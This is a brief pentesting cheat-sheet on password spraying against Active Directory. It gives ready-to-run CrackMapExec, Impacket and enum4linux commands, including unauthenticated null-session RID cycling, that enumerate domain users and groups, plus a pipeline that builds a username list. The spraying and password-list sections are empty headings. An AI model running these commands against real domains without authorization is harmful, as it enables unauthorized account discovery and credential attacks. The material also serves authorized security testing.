Password Spraying
Methodology for performing password spraying attacks against active directory
Get List of Users
# Get List of Users with CrackMapExec via RID Cycling (Unauthenticated)
crackmapexec smb $dc -u '' -p '' --users
crackmapexec smb $dc -u '' -p '' --groups
# Get List of Users with CrackMapExec via RID Cycling
crackmapexec smb $dc -u $username -p $password --users
# Get List of Users with Impacket
GetADUsers.py $domain/$username:$password -all -dc-ip $dc
# Get List of Users with Enum4linux
enum4linux $dc -u $username -p $password -U
# Sort Usernames Obtained from Enum4Linux
cat usernameenum.txt | grep "user" | awk {'print $1'} | cut -d '[' -f 2 | cut -d ']' -f 1 | sort -u -f > UsernameList.txtSpraying
Password List
References
Last updated